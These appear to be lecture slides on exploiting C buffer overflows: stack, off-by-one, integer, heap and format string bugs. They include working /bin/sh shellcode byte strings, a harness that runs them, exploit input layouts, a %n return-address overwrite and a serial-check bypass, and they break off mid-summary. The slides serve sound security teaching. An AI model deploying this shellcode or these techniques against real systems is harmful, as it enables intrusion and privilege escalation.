Buffer

Buffer overflows occur when data is written outside the allocated buffer space, particularly in C where bounds checking is not enforced. The document explains stack-based and heap-based buffer overflows, provides examples of code that can lead to such vulnerabilities, and discusses the implications of executing injected code. Additionally, it covers techniques for exploiting these vulnerabilities, including shellcode injection and the execution of system calls.

Uploaded by

Menberu Munye
What are Buffer Overflows?

A buffer overflow occurs when data is written outside of the space allocated for the buffer.
• C does not check that writes are in bounds

1. Stack-based
– covered in this class
2. Heap-based
– more advanced
– very dependent on system and library version

Basic Example
#include <string.h>
int main(int argc, char **argv) {
    char buf[64];
    strcpy(buf, argv[1]);
}

Dump of assembler code for function main:
0x080483e4 <+0>: push %ebp
0x080483e5 <+1>: mov %esp,%ebp
0x080483e7 <+3>: sub $72,%esp
0x080483ea <+6>: mov 12(%ebp),%eax
0x080483ed <+9>: mov 4(%eax),%eax
0x080483f0 <+12>: mov %eax,4(%esp)
0x080483f4 <+16>: lea -64(%ebp),%eax
0x080483f7 <+19>: mov %eax,(%esp)
0x080483fa <+22>: call 0x8048300 <strcpy@plt>
0x080483ff <+27>: leave
0x08048400 <+28>: ret

Stack before the call to strcpy (highest address first):
    …
    argv
    argc
    return addr
    caller’s ebp        <- %ebp
    buf (64 bytes)
    …
    argv[1]             (second argument to strcpy)
    buf                 <- %esp (first argument to strcpy)

Input: “123456”
Same program and disassembly as in the Basic Example. Stack after strcpy returns (highest address first):
    …
    argv
    argc
    return addr
    caller’s ebp        <- %ebp
    buf (64 bytes)      holds 123456\0
    …
    argv[1]
    buf                 <- %esp

Input: “A”x68 . “\xEF\xBE\xAD\xDE”
Same program and disassembly as in the Basic Example. buf starts at -64(%ebp), so the first 64 bytes fill buf, the next 4 overwrite the caller’s saved ebp, and the 4 after that overwrite the return address. Stack after strcpy returns (highest address first):
    …
    argv
    argc                corrupted (strcpy’s terminating \0 lands here)
    return addr         overwritten with 0xDEADBEEF
    caller’s ebp        overwritten with AAAA   <- %ebp
    buf (64 bytes)      AAAA… (64 in total)
    …
    argv[1]
    buf                 <- %esp

Frame teardown (1)
Execution is at the leave instruction (0x080483ff <+27>), which is equivalent to:
    1. mov %ebp,%esp
    2. pop %ebp
After step 1, %esp and %ebp both point at the overwritten saved ebp (highest address first):
    …
    argv
    argc                corrupted
    return addr         overwritten with 0xDEADBEEF
    caller’s ebp        overwritten with AAAA   <- %esp and %ebp

Frame teardown (2)
After step 2 of leave (pop %ebp), %ebp = AAAA and %esp points at the overwritten return address (highest address first):
    …
    argv
    argc                corrupted
    return addr         overwritten with 0xDEADBEEF   <- %esp

Frame teardown (3)
ret pops the overwritten return address into %eip (highest address first):
    …
    argv
    argc                corrupted   <- %esp
    %eip = 0xDEADBEEF (probably crash)

Shellcode
Traditionally, we inject assembly instructions for exec(“/bin/sh”) into buffer.
• see “Smashing the stack for fun and profit” for exact string
• or search online

Stack after the overflow (highest address first):
    …
    argv
    argc
    &buf                (in place of the return addr)
    saved ebp slot      <- %ebp
    shellcode…          (inside buf)
    …
    argv[1]
    buf                 <- %esp

Executing system calls
execve(“/bin/sh”, 0, 0);
1. Put syscall number in eax (execve is 0xb)
2. Set up arg 1 in ebx, arg 2 in ecx, arg 3 in edx (here: addr. in ebx, 0 in ecx)
3. Call int 0x80*
4. System call runs. Result in eax

* using sysenter is faster, but this is the traditional explanation

Shellcode example
    xor ecx, ecx
    mul ecx
    push ecx
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    mov al, 0xb
    int 0x80

Executable string:
    "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89"
    "\xe3\xb0\x0b\xcd\x80";

Notice no NULL chars. Why?
Author: kernel_panik, [Link]

Program Example
#include <stdio.h>
#include <string.h>

char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
              "\x73\x68\x68\x2f\x62\x69\x6e\x89"
              "\xe3\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
    /* strlen returns size_t, so it is printed with %zu */
    printf("Shellcode length : %zu bytes\n", strlen(code));
    int (*f)() = (int (*)())code;
    f();
}
$ gcc -o shellcode -fno-stack-protector -z execstack shellcode.c

Execution
    xor ecx, ecx
    mul ecx
    push ecx
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    mov al, 0xb
    int 0x80

Registers at int 0x80:
    ebx = esp
    ecx = 0
    eax = 0x0b

Stack at int 0x80 (highest address first):
    0x0   (the pushed zero word, which terminates the string)
    0x68  h
    0x73  s
    0x2f  /
    0x2f  /
    0x6e  n
    0x69  i
    0x62  b
    0x2f  /    <- esp

Tips
Factors affecting the stack frame:
• statically declared buffers may be padded
• what about space for callee-save regs?
• [advanced] what if some vars are in regs only?
• [advanced] what if the compiler reorders local variables on the stack?

gdb is your friend! (google gdb quick reference)

Don’t just brute force or guess offsets. Think!

nop slides
WARNING: Environment changes address of buf
    $ OLDPWD=“” ./vuln
    vs.
    $ OLDPWD=“aaaa” ./vuln

Protip: Inserting nop’s (e.g., 0x90) into shellcode allows for slack. Overwriting the return addr with any position in the nop slide is ok.

Stack (highest address first):
    env
    argv
    argc
    return addr
    caller’s ebp
    buf: execve
         0x90
         ...
         0x90           (nop slide)
    argv[1]
    buf

Recap
To generate exploit for a basic buffer overflow:
1. Determine size of stack frame up to head of buffer
2. Overflow buffer with the right size

Input layout: shellcode | padding | &buf
(computation + control)

Stack Buffers
• Suppose Web server contains this function
    void func(char *str) {
        char buf[126];        /* Allocate local buffer (126 bytes reserved on stack) */
        strcpy(buf,str);      /* Copy argument into local buffer */
    }
• When this function is invoked, a new frame with local variables is pushed onto the stack

    <- Stack grows this way
    | buf | sfp | ret addr | str | Frame of the calling function | Top of stack

    buf: local variables
    sfp: pointer to previous frame
    ret addr: execute code at this address after func() finishes
    str: arguments

What If Buffer is Overstuffed?
• Memory pointed to by str is copied onto stack…
    void func(char *str) {
        char buf[126];
        strcpy(buf,str);      /* strcpy does NOT check whether the string at *str contains fewer than 126 characters */
    }
• If a string longer than 126 bytes is copied into buffer, it will overwrite adjacent stack locations

    | buf | overflow | str | Frame of the calling function | Top of stack

    The overflow covers the sfp and ret addr slots: this will be interpreted as return address!

Executing Attack Code
• Suppose buffer contains attacker-created string
– For example, *str contains a string received from the network as input to some network service daemon

    | code | ret | str | Frame of the calling function | Top of stack

    code: attacker puts actual assembly instructions into his input string, e.g., binary code of execve(“/bin/sh”)
    ret: in the overflow, a pointer back into the buffer appears in the location where the system expects to find return address

• When function exits, code in the buffer will be executed, giving attacker a shell
– Root shell if the victim program is setuid root

Stack Corruption (Redux)
    int bar (int val1) {
        int val2;
        foo (a_function_pointer);
    }

    int foo (void (*funcp)()) {
        char* ptr = point_to_an_array;
        char buf[128];
        gets (buf);
        strncpy(ptr, buf, 8);
        (*funcp)();
    }

Stack (highest address first; the stack grows down, while the string in buf grows up and contaminates the memory above it):
    val1
    val2
    arguments (funcp)
    return address              (most popular target)
    Previous Frame Pointer
    pointer var (ptr)
    buffer (buf)

Attack #1: Return Address
① Change the return address to point to the attack code. After the function returns, control is transferred to the attack code
② … or return-to-libc: use existing instructions in the code segment such as system(), exec(), etc. as the attack code; set stack pointers to return to a dangerous library function, e.g. system() with “/bin/sh”

Stack (highest address first):
    Attack code
    args (funcp)
    return address      (① points to the attack code, or ② to system())
    PFP
    pointer var (ptr)
    buffer (buf)

Buffer Overflow Issues
• Executable attack code is stored on stack, inside
the buffer containing attacker’s string
– Stack memory is supposed to contain only data, but…
• For the basic attack, overflow portion of the buffer
must contain correct address of attack code in the
RET position
– The value in the RET position must point to the
beginning of attack assembly code in the buffer
• Otherwise application will crash with segmentation violation
– Attacker must correctly guess in which stack position
his buffer will be when the function is called
Problem: No Range Checking
• strcpy does not check input size
– strcpy(buf, str) simply copies memory contents into
buf starting from *str until “\0” is encountered,
ignoring the size of area allocated to buf
• Many C library functions are unsafe
– strcpy(char *dest, const char *src)
– strcat(char *dest, const char *src)
– gets(char *s)
– scanf(const char *format, …)
– printf(const char *format, …)
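
One way to avoid the unchecked copy is to pass the destination size along with the pointer and let snprintf enforce it. The following is a minimal sketch, not code from the slides; bounded_copy is a hypothetical helper name, and it reports truncation instead of silently cutting the input.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not from the slides): copy src into dst without
 * ever writing more than dst_size bytes.
 * Returns 0 on success, -1 if src did not fit and was truncated. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    assert(dst != NULL && src != NULL && dst_size > 0);

    /* snprintf writes at most dst_size bytes, including the terminating
     * '\0', and returns the length the full output would have had. */
    int needed = snprintf(dst, dst_size, "%s", src);

    if (needed < 0 || (size_t)needed >= dst_size)
        return -1;  /* output error, or the input was truncated */
    return 0;
}
```

A caller would use it as bounded_copy(buf, sizeof buf, str) and treat -1 as a rejected input.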
Does Range Checking Help?
• strncpy(char *dest, const char *src, size_t n)
– If strncpy is used instead of strcpy, no more than n
characters will be copied from *src to *dest
• Programmer has to supply the right value of n
• Potential overflow in htpasswd.c (Apache 1.3):
    … strcpy(record,user);
      strcat(record,":");
      strcat(record,cpw); …
  Copies username (“user”) into buffer (“record”), then appends “:” and hashed password (“cpw”)
• Published “fix” (do you see the problem?):
    … strncpy(record,user,MAX_STRING_LEN-1);
      strcat(record,":");
      strncat(record,cpw,MAX_STRING_LEN-1); …

Misuse of strncpy in htpasswd “Fix”
• Published “fix” for Apache htpasswd overflow:
    … strncpy(record,user,MAX_STRING_LEN-1);
      strcat(record,":");
      strncat(record,cpw,MAX_STRING_LEN-1); …

MAX_STRING_LEN bytes allocated for record buffer:
    | contents of *user | : | contents of *cpw |
    strncpy: put up to MAX_STRING_LEN-1 characters into buffer
    strcat: put “:”
    strncat: again put up to MAX_STRING_LEN-1 characters into buffer
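
The three calls in the published fix can together write up to 2*(MAX_STRING_LEN-1)+1 characters plus a terminator into a buffer of MAX_STRING_LEN bytes, because each bound ignores what is already in the buffer. A sketch of a single bounded write over the whole record follows; build_record is a hypothetical helper, and the value of MAX_STRING_LEN here is an assumption for illustration, not Apache's actual constant.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Assumed size, for illustration only. */
#define MAX_STRING_LEN 256

/* Hypothetical helper: build "user:cpw" in record, whose total capacity
 * is record_size bytes. One bound covers the whole result.
 * Returns 0 on success, -1 if the result would not fit. */
int build_record(char *record, size_t record_size,
                 const char *user, const char *cpw)
{
    assert(record != NULL && user != NULL && cpw != NULL && record_size > 0);

    int needed = snprintf(record, record_size, "%s:%s", user, cpw);

    if (needed < 0 || (size_t)needed >= record_size)
        return -1;  /* refuse truncated records rather than store them */
    return 0;
}
```

The design choice is to bound the final length once, instead of bounding each piece separately as the published fix does.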

Attack #2: Pointer Variables
① Change a function pointer to point to the attack code
② Any memory, even not in the stack, can be modified by the statement that stores a value into the compromised pointer
    strncpy(ptr, buf, 8);
    *ptr = 0;

Targets shown on the slide: attack code, function pointer, Global Offset Table

Stack (highest address first):
    args (funcp)        ① function pointer
    return address
    PFP
    pointer var (ptr)   ②
    buffer (buf)

Off-By-One Overflow
• Home-brewed range-checking string copy
    void notSoSafeCopy(char *input) {
        char buffer[512]; int i;
        for (i=0; i<=512; i++)      /* This will copy 513 characters into buffer. Oops! */
            buffer[i] = input[i];
    }
    void main(int argc, char *argv[]) {
        if (argc==2)
            notSoSafeCopy(argv[1]);
    }
• 1-byte overflow: can’t change RET, but can change pointer to previous stack frame
– On little-endian architecture, make it point into buffer
– RET for previous function will be read from buffer!
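
For contrast, a corrected version of the copy loop might look like the sketch below. safe_copy and BUF_SIZE are names chosen here for illustration; the loop stops one slot early so the terminator always fits, and it also stops at the end of the input instead of reading past it.

```c
#include <assert.h>
#include <stddef.h>

#define BUF_SIZE 512

/* Copies at most BUF_SIZE - 1 characters of input into buffer and always
 * NUL-terminates. Returns the number of characters copied. */
size_t safe_copy(char buffer[BUF_SIZE], const char *input)
{
    assert(buffer != NULL && input != NULL);

    size_t i;
    /* i < BUF_SIZE - 1 (not i <= BUF_SIZE) leaves room for the '\0'. */
    for (i = 0; i < BUF_SIZE - 1 && input[i] != '\0'; i++)
        buffer[i] = input[i];
    buffer[i] = '\0';
    return i;
}
```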

Attack #3: Frame Pointer
① Change the caller’s saved frame pointer to point to attack-controlled memory. Caller’s return address will be read from this memory.

Stack (highest address first):
    return address      (caller’s frame)
    PFP
    Attack code
    args (funcp)
    return address
    PFP                 ①
    pointer var (ptr)
    buffer (buf)

Two’s Complement
Binary representation of negative integers
Represent X (where X<0) as 2^N-|X|
• N is word size (e.g., 32 bits on x86 architecture)

    Value       Bit pattern (N = 32)
    1           0 0 0 0 … 0 1
    2^31-1      0 1 1 1 … 1 1
    -1          1 1 1 1 … 1 1
    -2          1 1 1 1 … 1 0
    -2^31       1 0 0 0 … 0 0
    2^31        ??
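
The rule 2^N-|X| can be checked directly for N = 32. The sketch below uses a hypothetical helper, twos_complement_bits, and does the arithmetic in 64 bits so that 2^32 itself is representable.

```c
#include <assert.h>
#include <stdint.h>

/* For a negative 32-bit x, returns the bit pattern 2^32 - |x|. */
uint32_t twos_complement_bits(int32_t x)
{
    assert(x < 0);

    /* Widen first: |INT32_MIN| and 2^32 do not fit in 32 bits. */
    int64_t magnitude = -(int64_t)x;
    return (uint32_t)(((int64_t)1 << 32) - magnitude);
}
```

For example, -1 maps to 0xFFFFFFFF and -2^31 maps to 0x80000000, matching the rows of the table.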

Integer Overflow
    static int getpeername1(p, uap, compat) {
        // In FreeBSD kernel, retrieves address of peer to which a socket is connected
        …
        struct sockaddr *sa;
        …
        len = MIN(len, sa->sa_len);     // Checks that “len” is not too big.
                                        // Negative “len” will always pass this check…
        …
        copyout(sa, (caddr_t)uap->asa, (u_int)len);
                                        // Copies “len” bytes from kernel memory to user space.
                                        // … “len” is interpreted as a huge unsigned integer here
                                        // … will copy up to 4G of kernel memory
        …
    }
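
The missing step is a sign check before the length is ever converted to an unsigned type. A minimal sketch follows; checked_copy_len is a hypothetical helper, not the FreeBSD fix, and it simply rejects negative lengths and clamps the rest.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: validate a caller-supplied signed length against
 * the number of bytes actually available.
 * On success stores the number of bytes to copy in *out and returns 0;
 * returns -1 if len is negative. */
int checked_copy_len(int len, size_t available, size_t *out)
{
    assert(out != NULL);

    if (len < 0)
        return -1;              /* reject before any signed-to-unsigned cast */

    size_t n = (size_t)len;     /* safe: len is known to be non-negative */
    *out = (n < available) ? n : available;
    return 0;
}
```

Without the check, a len of -1 survives MIN(len, 16) unchanged and then becomes the largest unsigned value when cast.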

Heap Overflow
• Overflowing buffers on heap can change pointers that point to important data
– Sometimes can also transfer execution to attack code
• For example, December 2008 attack on XML parser in Internet Explorer 7 - see [Link]
• Illegitimate privilege elevation: if program with overflow has sysadm/root rights, attacker can use it to write into a normally inaccessible file
– For example, replace a filename pointer with a pointer into buffer location containing name of a system file
• Instead of temporary file, write into [Link]

Variable Arguments in C
• In C, can define a function with a variable number of arguments
– Example: int printf(const char* format, …)
• Format specification encoded by special %-encoded characters
– %d,%i,%o,%u,%x,%X – integer argument
– %s – string argument
– %p – pointer argument (void *)
– Several others

Implementation of Variable Args
• Special macros va_start, va_arg, va_end compute arguments at run-time (how?)

Activation Record for Variable Args
• va_start computes location on the stack past last statically known argument
• va_arg(ap,type) retrieves next arg from offset ap
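
A small variadic function shows the three macros in use. This is a sketch with a hypothetical name, sum_ints; note that the callee has no way to verify how many arguments were really passed or what their types are, which is the property format string attacks rely on.

```c
#include <assert.h>
#include <stdarg.h>

/* Sums `count` int arguments that follow the named parameter. */
int sum_ints(int count, ...)
{
    assert(count >= 0);

    va_list ap;
    int total = 0;

    va_start(ap, count);            /* position ap just past the last named argument */
    for (int i = 0; i < count; i++)
        total += va_arg(ap, int);   /* fetch the next argument, trusting the caller about its type */
    va_end(ap);

    return total;
}
```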

Format Strings in C
• Proper use of printf format string:
    … int foo=1234;
      printf("foo = %d in decimal, %X in hex",foo,foo); …
– This will print
    foo = 1234 in decimal, 4D2 in hex
• Sloppy use of printf format string:
    … char buf[14]="Hello, world!";
      printf(buf);
      // should’ve used printf("%s", buf); …
• If the buffer contains a format symbol starting with %, location pointed to by printf’s internal stack pointer will be interpreted as an argument of printf. This can be exploited to move printf’s internal stack pointer!
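
The fix named on the slide, a constant "%s" format, can be wrapped once so that untrusted text is always treated as data. The helper name format_untrusted below is hypothetical; the sketch only shows that % sequences in the input come out unchanged instead of being interpreted.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: render untrusted text into out as plain data.
 * The format string is a constant, so any % sequences inside `untrusted`
 * are copied verbatim and never interpreted.
 * Returns what snprintf returns: the length the full output would have. */
int format_untrusted(char *out, size_t out_size, const char *untrusted)
{
    assert(out != NULL && untrusted != NULL && out_size > 0);
    return snprintf(out, out_size, "%s", untrusted);
}
```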

Writing Stack with Format Strings
• %n format symbol tells printf to write the number of characters that have been printed
    … printf("Overflow this!%n",&myVar); …
– Argument of printf is interpreted as destination address
– This writes 14 into myVar (“Overflow this!” has 14 characters)
• What if printf does not have an argument?
    … char buf[17]="Overflow this!%n";
      printf(buf); …
– Stack location pointed to by printf’s internal stack pointer will be interpreted as address into which the number of characters will be written!

Using %n to Mung Return Address
Buffer with attacker-supplied input string:
    | “… attackString%n”, attack code | &RET | RET |

• The “…” portion contains enough % symbols to advance printf’s internal stack pointer
• Number of characters in attackString must be equal to … what?
• Overwrite location under printf’s stack pointer with RET address; printf(buffer) will write the number of characters in attackString into RET
• RET: return execution to this address

C has a concise way of printing multiple symbols: %Mx will print exactly M bytes (taking them from the stack). If attackString contains enough “%Mx” so that its total length is equal to the most significant byte of the address of the attack code, this byte will be written into &RET.
Repeat three times (four “%n” in total) to write into &RET+1, &RET+2, &RET+3, replacing RET with the address of attack code.

• See “Exploiting Format String Vulnerabilities” for details

Other Targets of Memory Exploits
• Configuration parameters
– E.g., directory names that confine remotely
invoked programs to a portion of the server’s file
system
• Pointers to names of system programs
– For example, replace the name of a harmless
script with an interactive shell
– This is not the same as return-to-libc (why?)
• Branch conditions in input validation code
SSH Authentication Code
(Code listing not preserved; the slide’s annotations follow.)
• Loop until one of the authentication methods succeeds
• detect_attack() prevents checksum attack on SSH1…
• …and also contains an overflow bug which permits the attacker to put any value into any memory location
• write 1 here
• Break out of authentication loop without authenticating properly

Background: Layout of the Virtual Space of a Process
(Figure: the layout of the virtual space of a process in Linux)
Cont.
• Code and data consist of instructions and of initialized and uninitialized global and static data, respectively;
• Runtime heap is used for dynamically allocated memory (malloc());
• The stack is used whenever a function call is made.
Layout Of Stack
• Grows from high-end address to low-end address (buffer grows from low-end address to high-end address);
• Return Address: when a function returns, the instructions it points to will be executed;
• Stack frame pointer (ebp): used to reference local variables and function parameters.
Example
    int cal(int a, int b)
    {
        int c;
        c = a + b;
        return c;
    }

    int main()
    {
        int d;
        d = cal(1, 2);
        printf("%d\n", d);
        return;
    }

Stack inside cal (low-end address first):
    …                           <- esp
    c
    previous ebp                <- ebp
    Ret addr (0x08048229)
    a (1)
    b (2)
    (high-end address)
Dump of assembler code for function main:
0x08048204 <main+0>: lea 0x4(%esp),%ecx
0x08048208 <main+4>: and $0xfffffff0,%esp
0x0804820b <main+7>: pushl -0x4(%ecx)
0x0804820e <main+10>: push %ebp
0x0804820f <main+11>: mov %esp,%ebp
0x08048211 <main+13>: push %ecx
0x08048212 <main+14>: sub $0x24,%esp
0x08048215 <main+17>: movl $0x2,0x4(%esp) ; pass parameter
0x0804821d <main+25>: movl $0x1,(%esp) ; pass parameter
0x08048224 <main+32>: call 0x80481f0 <cal>
0x08048229 <main+37>: mov %eax,-0x8(%ebp)
0x0804822c <main+40>: mov -0x8(%ebp),%eax
0x0804822f <main+43>: mov %eax,0x4(%esp)
0x08048233 <main+47>: movl $0x80a0c88,(%esp)
0x0804823a <main+54>: call 0x8048c40 <printf>
0x0804823f <main+59>: add $0x24,%esp
0x08048242 <main+62>: pop %ecx
0x08048243 <main+63>: pop %ebp
0x08048244 <main+64>: lea -0x4(%ecx),%esp
0x08048247 <main+67>: ret
Dump of assembler code for function cal:
0x080481f0 <cal+0>: push %ebp
0x080481f1 <cal+1>: mov %esp,%ebp
0x080481f3 <cal+3>: sub $0x10,%esp ; reserve 16 bytes for local variables in stack
0x080481f6 <cal+6>: mov 0xc(%ebp),%eax
0x080481f9 <cal+9>: add 0x8(%ebp),%eax
0x080481fc <cal+12>: mov %eax,-0x4(%ebp)
0x080481ff <cal+15>: mov -0x4(%ebp),%eax
0x08048202 <cal+18>: leave
0x08048203 <cal+19>: ret
Layout of Heap
• Global variables
• Static variables
• Dynamically allocated memory
Stack Buffer Overflow
• A buffer overflow occurs when too much data is put into the
buffer;
• C language and its derivatives(C++) offer many ways to put
more data than anticipated into a buffer;
Example
    #include <stdio.h>
    #include <string.h>

    int bof()
    {
        char buffer[8]; // an 8-byte buffer which is in the stack
        strcpy(buffer, "AAAAAAAAAAAAAAAAAAA"); // copy 20 bytes into buffer
        // this will cause the content of "ret" to be overwritten;
        // namely, the return address will be 0x41414141 (AAAA)
        return 1;
    }

    int main()
    {
        bof(); // call bof
        printf("end\n"); // will never be executed
        return 1;
    }

Stack inside bof after strcpy (low address first):
    AAAA                        <- ESP (buffer)
    AAAA
    AAAA (previous EBP)         <- EBP
    AAAA (RET, which pointed back to the printf() call in main)
    AAAA
Basic Idea of the Attack using stack buffer overflow
• Inject malicious code into the virtual space of a process;
• Modify the content of RET to redirect the execution flow to the malicious code.

Stack (low address first; the stack grows toward low addresses, the string grows toward high addresses):
    Local variable (buffer)
    RET
    Attack Code
    (high address, TOP of Stack)
Example
• Program asks for a serial number that attacker does not know
• Attacker also does not have source code
• Attacker does have the executable (exe)
• Program quits on incorrect serial number
Cont.
• By trial and error, attacker discovers an apparent buffer overflow
• Note that 0x41 is “A”
• Looks like ret overwritten by 2 bytes!
• I think the stack is overwritten by 3 bytes.
Cont.

The goal is to exploit a buffer overflow so that the execution flow can be redirected to 0x00401034.
Cont.
• Find that 401034 is “@^P4” in ASCII ('\0' is 00)
• Byte order is reversed? Why?
• X86 processors are “little-endian”
Cont.
• Reverse the byte order to “4^P@” (\x34\x10\x40\x00) and…
• Success! We’ve bypassed serial number check by exploiting a buffer overflow
• Overwrote the return address on the stack
Example-Create a shell
    char shellcode[] =
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
        "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
        "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

    int main(){
        char *name[2];
        name[0] = "/bin/sh";
        name[1] = 0x0;
        execve(name[0], name, 0x0);
        exit(0);
    }

• Shellcode can be viewed as a sequence of binary instructions;
• The purpose of this shellcode is to create a command shell in Linux.
• It can be used to create a shell with root privilege.
Cont.
    void sh()
    {
        int *ret;
        ret = (int *)&ret + 2;      // let ret point to the unit containing the return address
        (*ret) = (int)shellcode;    // let the return address point to the shellcode (shell code to create a shell)
    }

    int main()
    {
        sh();
        printf("main end :)\n");
        return;
    }
Cont.
(gdb) disas sh
Dump of assembler code for function sh:
0x08048208 <sh+0>: push %ebp
0x08048209 <sh+1>: mov %esp,%ebp
0x0804820b <sh+3>: sub $0x10,%esp
0x0804820e <sh+6>: lea -0x4(%ebp),%eax
0x08048211 <sh+9>: add $0x8,%eax
0x08048214 <sh+12>: mov %eax,-0x4(%ebp)
0x08048217 <sh+15>: mov -0x4(%ebp),%edx
0x0804821a <sh+18>: mov $0x80bd6a0,%eax
0x0804821f <sh+23>: mov %eax,(%edx)
0x08048221 <sh+25>: leave
0x08048222 <sh+26>: ret

Stack inside sh (low address first):
    return              (the local pointer variable)
    Previous ebp
    RET
Three issues for injecting codes
• How to find a location in the stack to inject malicious code?
• How to generate a shellcode (Attack Code)?
• How to redirect the execution flow to the shellcode?
– If using stack buffer overflow, the content of memory unit
storing return address should be modified.
– The injected payload should be long enough to do
overwriting.
How to find a location to inject code
• If using stack buffer overflow, we might need to locate the stack of a
function.
• Then we need to determine the offset from the bottom or the top
of stack to inject the shell code
• We can use the following code to locate a stack:

    unsigned long find_start(void)
    {
        __asm__("movl %esp, %eax");
    }

    unsigned long find_end(void)
    {
        __asm__("movl %ebp, %eax");
    }
Cont.

    #include <stdio.h>

    unsigned long find_start(void)
    {
        __asm__("movl %esp, %eax");
    }

    unsigned long find_end(void)
    {
        __asm__("movl %ebp, %eax");
    }

    int main()
    {
        /* unsigned long is printed with %lx */
        printf("0x%lx\n", find_start());
        printf("0x%lx\n", find_end());
    }
Shell code
• Shellcode is a set of instructions that is injected into and then executed by an exploited program;
• Shellcode is used to directly manipulate registers and the function of a program;
• Most shellcode uses system calls to carry out its malicious behavior;
• System calls are a set of functions that give access to operating-system services such as getting input, producing output, and exiting a process;
How to execute a system call in Linux?

• Use libc wrappers


– Ex: read, write etc;
– Works indirectly with assembly code to execute system calls;
• Directly use assembly code
– System call via software interrupts, for example int 0x80;

In Linux, a shell code uses int 0x80 to raise system calls.


The process of executing a system call
• The system call number is loaded into EAX;
• Arguments to the system call function are placed in other registers;
• The instruction int 0x80 is executed;
• The CPU switches to kernel mode;
• The system call function is executed.

Example:
    main()
    {
        exit(0);
    }
Cont.
gcc -g -static -o exit exit.c
gdb exit
Arlington:/home/src/shellcodes/code/ch03# gdb exit
GNU gdb 6.7.1-debian
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <[Link]
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/i686/cmov/libthread_db.so.1".
(gdb) disas _exit
Dump of assembler code for function _exit:
0x0804df4c <_exit+0>: mov 0x4(%esp),%ebx
0x0804df50 <_exit+4>: mov $0xfc,%eax
0x0804df55 <_exit+9>: int $0x80
0x0804df57 <_exit+11>:mov $0x1,%eax
0x0804df5c <_exit+16>: int $0x80
0x0804df5e <_exit+18>: hlt
End of assembler dump.
Write a shell code for exit()
• The shell code should do the following:
– Store the value of 0 into EBX;
– Store the value of 1 into EAX;
– Execute int 0x80 instruction
Cont.

First, we write ASM codes ([Link]) as follows:

Section .text
global _start

_start:

mov ebx, 0
mov eax, 1
int 0x80
Cont.
Arlington:/home/src/shellcodes/# nasm -f elf [Link]
Arlington:/home/src/shellcodes/# ld -o exit_1 exit.o
Arlington:/home/src/shellcodes/# objdump -d exit_1

exit_1: file format elf32-i386

Disassembly of section .text:

08048060 <_start>:
8048060: bb 00 00 00 00 mov $0x0,%ebx
8048065: b8 01 00 00 00 mov $0x1,%eax
804806a: cd 80 int $0x80
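The opcode bytes in the second column (bb 00 00 00 00, b8 01 00 00 00, cd 80; shown in red on the original slide) can be used as the shell code.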
Cont.
    char shellcode[] = "\xbb\x00\x00\x00\x00"
                       "\xb8\x01\x00\x00\x00"
                       "\xcd\x80";

    int main()
    {
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int)shellcode;
    }
Injectable Shellcode
• Null (\x00) will cause shellcode to fail when injected into a
character array because \x00 is used to terminate strings;
• Injectable shellcode can't contain \x00;
• shellcode[] = "\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80" is not an
injectable shellcode;
• How to remove \x00?
• Use “xor ebx, ebx” to replace “mov ebx, 0”
• Use “mov al, 1 ” to replace “mov eax, 1”
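
Why \x00 matters can be seen from the string functions themselves: they stop at the first zero byte, so anything after it is never copied. The sketch below uses a hypothetical helper, contains_nul, to scan a byte sequence of known length; the byte arrays in the usage note are the two exit() encodings from these slides.

```c
#include <assert.h>
#include <string.h>

/* Returns 1 if the len-byte sequence contains a 0x00 byte, 0 otherwise.
 * The length is passed explicitly because strlen would stop at the
 * first zero byte. */
int contains_nul(const unsigned char *bytes, size_t len)
{
    assert(bytes != NULL);
    return memchr(bytes, 0x00, len) != NULL;
}
```

Applied to "\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80" (12 bytes) the check reports a zero byte, and strlen on the same array returns 1, so strcpy would copy only the first byte. Applied to "\x31\xdb\xb0\x01\xcd\x80" it reports none.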
Cont.
bb 00 00 00 00 mov $0x0,%ebx
b8 01 00 00 00 mov $0x1,%eax
cd 80 int $0x80

After the transformation, the code is changed to:

    31 db    xor %ebx,%ebx
    b0 01    mov $0x1,%al
    cd 80    int $0x80

    shellcode[] = "\x31\xdb\xb0\x01\xcd\x80"
A framework for injectable shellcode

Jmp short GotoCall

shellcode:
pop esi // esi will contain the address of '/bin/sh'
<shellcode meat>

GotoCall:
Call shellcode // GetPC code
Db '/bin/sh'
GetPC Code
• Call
• fsave/fstenv
• Can be used to get the address of last FPU instruction
– fldz
– fnstenv [esp-12]
– pop ecx
– add cl, 10
– nop
– ECX will hold the address of the EIP.
An Example
section .text
global _start
_start:
jmp short GotoCall
shellcode:
pop esi
xor eax, eax
mov byte [esi + 7], al
lea ebx, [esi]
mov long [esi + 8], ebx
mov long [esi + 12], eax
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi + 12]
int 0x80
GotoCall:
Call shellcode // GetPC Code
db '/bin/shJAAAAKKKK' // AAAA and KKKK can be parameters
for system calls
NOP Sled
• Determining the correct offset for injecting code is not easy;
• A NOP (no-operation) sled can be used to increase the number of potential offsets;
• Generally, we can fill in the beginning of shellcode with NOPs.
• The opcode for NOP is 0x90
• EX: shellcode[] = "\x90\x90\x90\x31\xdb\xb0\x01\xcd\x80"
• Some FPU, SSE, MMX instructions can also be used as a sled.
Summary of Launching An Attack
• Find a buffer overflow that can be used to
